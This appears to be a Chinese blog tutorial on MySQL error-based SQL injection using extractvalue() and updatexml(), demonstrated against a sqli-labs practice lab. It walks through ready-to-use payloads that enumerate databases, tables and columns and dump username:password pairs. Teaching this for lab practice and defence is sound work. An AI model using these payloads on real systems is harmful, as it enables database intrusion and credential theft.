MYSQL ExtractValue、UpdateXml报错注入详解

最新推荐文章于 2024-06-05 09:47:09 发布
最新推荐文章于 2024-06-05 09:47:09 发布
阅读量2.5k 收藏 5
点赞数 3
分类专栏: 学习 文章标签: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45146120/article/details/100073799
版权

MYSQL Extractvalue 报错注入

  • Extractvalue() 函数 使用XPath表示法从XML字符串中提取值
  • 参数 xml_frag, xpath_expr
    • xml_frag: 目标xml文档
    • xpath_expr: 利用Xpath路径法表示的查找路径
  • 报错原理:Xpath格式语法书写错误的话,就会报错

例如

 SELECT extractvalue('<a><b>x</b><b>y</b></a>','/a/b') as result

查询结果为

result
x y

如果第二个参数书写错误

 SELECT extractvalue('<a><b>x</b><b>y</b></a>','#username') as result

报错如下

-- SELECT * from users WHERE id = 1 and extractvalue(1,mid(concat(0x23,(SELECT GROUP_CONCAT(username,':',`password`) from users),0x23),159,32))
 SELECT extractvalue('<a><b>x</b><b>y</b></a>','#username') as result
> 1105 - XPATH syntax error: '#username'
> 时间: 0.001s

利用此特性可以实现报错注入

由于此报错注入和updatexml都只能爆最大32位,如果要爆出32位之后的数据,需要借助mid函数进行字符截取从而显示32位以后的数据

mid函数
参数描述
column_name必需。要提取字符的字段
start必需。开始位置
length可选。要返回的字符数。如果省略,则 MID() 函数返回剩余文本
SQL语句
  • 爆库等相关信息
SELECT * from users WHERE id = 1 and 
extractvalue(1,
mid(concat_ws(0x23,0x23,version(),user(),database(),@@version_compile_os,0x23),9,32))

在这里插入图片描述

  • 爆库
SELECT * from users WHERE id = 1 and 
extractvalue(1,
mid(concat(0x23,
(SELECT group_concat(schema_name) from information_schema.SCHEMATA),
0x23),50,32))

在这里插入图片描述

  • 爆表
SELECT * from users WHERE id = 1 and 
extractvalue(1,
mid(concat(0x23,
(SELECT group_concat(table_name) from information_schema.tables where table_schema = database()),
0x23),1,32))

在这里插入图片描述

  • 爆列
SELECT * from users WHERE id = 1 and 
extractvalue(1,
mid(concat(0x23,
(SELECT group_concat(COLUMN_NAME) from information_schema.`COLUMNS` where table_name = 'users'),
0x23),1,32))

在这里插入图片描述

  • 爆字段
SELECT * from users WHERE id = 1 and 
extractvalue(1,
mid(concat(0x23,
(SELECT GROUP_CONCAT(username,':',`password`) from users),
0x23),1,32))

在这里插入图片描述

sql-labs 演示
  • 爆关键信息
http://192.168.1.101/Less-1/?id=1' and 
extractvalue(1,
concat_ws(0x23,0x23,version(),user(),database(),@@version_compile_os)
)%23

在这里插入图片描述

  • 爆库
http://192.168.1.101/Less-1/?id=1' 
and extractvalue(1,
mid(concat(0x23, 
(SELECT group_concat(schema_name) from information_schema.SCHEMATA),
0x23),1,32))--+

在这里插入图片描述

  • 爆表
http://192.168.1.101/Less-1/?id=1' 
and extractvalue(1,
mid(concat(0x23,(SELECT group_concat(table_name) from information_schema.tables where table_schema = database())
,0x23),1,32))--+

在这里插入图片描述

  • 爆列
http://192.168.1.101/Less-1/?id=1' and 
extractvalue(1,
mid(concat(0x23,
(SELECT group_concat(COLUMN_NAME) from information_schema.`COLUMNS` where table_name = 'users'),
0x23),1,32))--+

在这里插入图片描述

  • 爆字段
http://192.168.1.101/Less-1/?id=1' and 
extractvalue(1,
mid(concat(0x23,
(SELECT GROUP_CONCAT(username,':',`password`) from users),
0x23),1,32))--+

在这里插入图片描述

MYSQL UpdateXML报错注入

  • UpdateXml() 函数 返回替换的XML片段
  • 参数 XML_document,XPath_String,new_value
    • XML_document 是string 格式,为XML文档对象的名称
    • XPath_String Xpath 格式的字符串
    • new_value ,String 格式,替换查找到的符合条件的数据
  • 报错原理,同extractValue,构造错误的Xpath,以达到报错注入
  • payload:updatexml(1,concat(0x23,payload,0x23),1)
Gundam-
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
mysql extractvalue_Sqli-labs Less-17 使用extractvalue()函数进行注入
weixin_34378978的博客
02-01 831
本关我们可以看到是一个修改密码的过程,利用的是update语句,与在用select时是一样的,我们仅需要将原先的闭合,构造自己的payload。尝试Username:adminPassword:1'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server versio...
MYSQL updatexml()函数注入解析
09-09
这个函数在处理XML数据时非常有用,但同时也可能成为安全漏洞的来源,特别是在没有正确过滤用户输入的情况下,可能导致SQL注入。 `updatexml()`函数的基本语法如下: ```sql UPDATEXML(XML_document, XPath_...
MySQL自带extractvalue解析XML,MySQL存储过程、游标
Konw Nothing
12-28 4443
表结构如下: 要求把每个xml消息中的某个字段取出来。 方法一:把所有的xml消息导出用Java或Python解析; 方法二:用MySQlextractvalue解析,也正是所要讲的首先看看解析一条XML消息是怎么样的,在navicat中执行下面的SQL SET @temp_xml = ' <?xml version="1.0" encoding="UTF-8"?> <MSG xmlns="ht
MySQL注入 | updatexmlextractvalue函数
m_de_g的博客
12-21 2848
SQL注入 | updatexml | extractvalue函数 一、自己搭建数据库及其内容 1.本地phpstudy打开phpmyAdmin 2.登录本机数据库的用户名及密码,并执行 3.点击数据库,输入我们想创建的库名(如:test123),点击创建 4.如下图所示,及数据库创建成功 5.进入到test123这个数据库中 6.点击创建数据表 7.输入数据表名,字段不够用的话,自行增加即可,此处表中设置了三个字段分别是id,name,password类型这里可以根据自己的需要进行设置,此处
SQL注入updatexml注入(函数解释)
最新发布
m0_74608722的博客
06-05 499
第二个参数 xml路径 是可操作的地方,xml文档中路径是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。原因:是因为updatexml(1,database(),1)这种书写的语法格式是正确的,所以不会爆出语法误,在SQL注入中无法得到想要的库、表、列名(为了得到他们,应该怎样书写呐?正常查询 第二个参数的格式为 /xxx/xx/xx/xx ,即使查询不到也不会
【SQL注入】基于extractvalue函数的注入原理
记录并分享学习安全的知识点..
02-18 554
函数是MySQL数据库中用于提取XML数据中指定路径的值的函数。它基于XPath语法,允许用户根据特定的路径表达式从XML格式的数据中获取所需信息。以下是关于MySQL中。
MYSQL 通过ExtractValue()注入
Ciyaso的博客
01-18 4034
函数解释: extractvalue():从目标XML中返回包含所查询值的字符串。   EXTRACTVALUE (XML_document, XPath_string);   第一个参数:XML_document是String格式,为XML文档对象的名称   第二个参数:XPath_string (Xpath格式的字符串)   concat:返回结果为连接参数产生的字符串。 原理 例如:SELECT ExtractValue('<a><b><b/></a&gt
Mysql注入详解.docx
11-20
MySQL 注入是一种安全漏洞利用技术,当应用程序在处理用户输入时未能充分过滤或转义SQL语句,导致数据库因误语法而返回误信息,攻击者可以通过分析这些误信息来获取敏感信息或执行恶意操作。以下是对MySQL...
MySQL五种注入1
08-04
MySQL五种注入是一种利用数据库的误反馈信息来获取敏感数据的技术,通常在网站存在SQL注入漏洞时被攻击者利用。以下将详细介绍这些方法: 1. **数据库版本暴露** 利用`information_schema.tables`系统表和`...
web-注入-皮卡丘靶场
07-15
注入】是一种安全漏洞,它发生在攻击者能够通过输入特定的数据,导致应用程序返回关于其内部结构或数据库状态的误信息。这种误信息可以揭示敏感信息,如数据库名称、表名、列名,甚至数据本身,从而为攻击...
sql注入注入函数extractvalueupdatexml函数的原理及使用
weixin_46145442的博客
11-28 6634
故意拼接两个函数误的Xpath字符串,使其并返回payload执行结果。
【sql注入-注入1】extractvalue()函数 注入
07-10 3161
注入extractvalue()函数的使用
extractvalue mysql_MySQLExtractValue
weixin_42470196的博客
01-19 784
I'm attempting to extract a username value from XML output that was loaded into a database column (file_output). My query is bringing back a null value and not performing as I expect it to. Your hel...
updatexml()和extractvalue()注入原理
Fly_Mojito的博客
06-14 527
updatexml()和extractvalue()注入原理
SQL注入——extractValue()注入
heyingcheng的博客
03-06 2683
在实际的注入过程中,查询的列(比如本例中的doc)是不用管的,随便写就可以。因为我们关注的是后面查询的更重要的东西(database)于是我们想到,如果在之前执行一下select语句,然后在提醒信息那里回显出我们想要的数据信息就好了,这就是注入。这条命令的意思是,想要显示的内容123456,这句话的意思是从第一个字符开始显示,显示后面的三个,即123。同理,从第31个字符开始显示,显示后面的30个字符。比如在本例中把查询参数的路径写,页面上只会显示查询不到内容,但是不会
SQL注入原理-详细讲解 extractvalue()、updatexml()、floor() 的原因
大大大蜜蜂的博客
10-12 5235
SQL注入原理 一、xpath语法格式误的mysql5.1.5版本中添加了extractvalue()、updatexml()函数,它们两个分别能够对XML文档进行查询、修改操作,下面分别对这两个函数进行介绍。 这里是MYSQLextractvalue()和updatexml()的官方介绍 1、extractvalue(xml_frag, xpath_expr):从一个使用xpath语法的xml字符串中提取一个值。 xml_frag:xml文档对象的名称,是一个string类型。 xpat
【SQL注入】基于extractvalue()的注入原理
开水的博客
02-18 391
函数是MySQL数据库中用于提取XML数据中指定路径的值的函数。它基于XPath语法,允许用户根据特定的路径表达式从XML格式的数据中获取所需信息。以下是关于MySQL中。
mysql extractvalue_MySQL使用ExtractValue(XML,'Value / Values')获取所有多个值(将一列拆分为行)...
weixin_34408918的博客
01-19 395
I have a non-normal field containing multiple values because it is Xml data that wasn't intended to be queried, until now. Can MySQL split this xml column into multiple rows?TableNameA | 123NameB ...
extractvalue注入理论及实战
走马
11-07 856
什么是注入构造语句,让误信息中夹杂可以显示数据库内容的查询语句,返回提示中包括数据库中的内容如上图所示,通过group by的,我们可以知道列数是多少输入正确的查询数据库的SQL语句,虽然可以执行成功,但是页面不显示数据库的名称我们故意将database写为databasa,此时数据库的名称security在信息中显示了出来因此可以利用的信息得到我们想要的信息。1.通过floor()注入2.通过extractvalue()注入
mysql注入updatexml原理
05-17
MySQL 注入是一种利用误信息披露漏洞来进行 SQL 注入攻击的方法。其中,updatexml 函数是一种常用的利用方式之一。 updatexml 函数可以用于对 XML 类型的数据进行操作。其基本语法如下: ``` updatexml(target_xml, xpath_expr, new_value) ``` 其中,target_xml 是待修改的 XML 数据,xpath_expr 是 XPath 表达式,new_value 是新的值。 在进行 SQL 注入攻击时,攻击者可以构造恶意的 xpath_expr 参数,使得 MySQL 数据库返回误的信息,从而获取敏感信息。 具体实现方法可以参考以下示例: ``` SELECT updatexml(null,concat(0x7e,(SELECT user()),0x7e),null); ``` 在这个例子中,攻击者使用 concat 函数将波浪符号(0x7e)和当前用户的信息拼接成字符串,并作为 xpath_expr 参数传递给 updatexml 函数。由于这个参数不合法,MySQL 数据库会返回误信息,其中包含了当前用户的信息。攻击者就可以从误信息中获取敏感信息。 为了防止这种攻击,应该对用户输入进行严格的过滤和验证,避免恶意的输入。同时,也可以通过限制 MySQL 用户的权限来降低攻击的风险。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值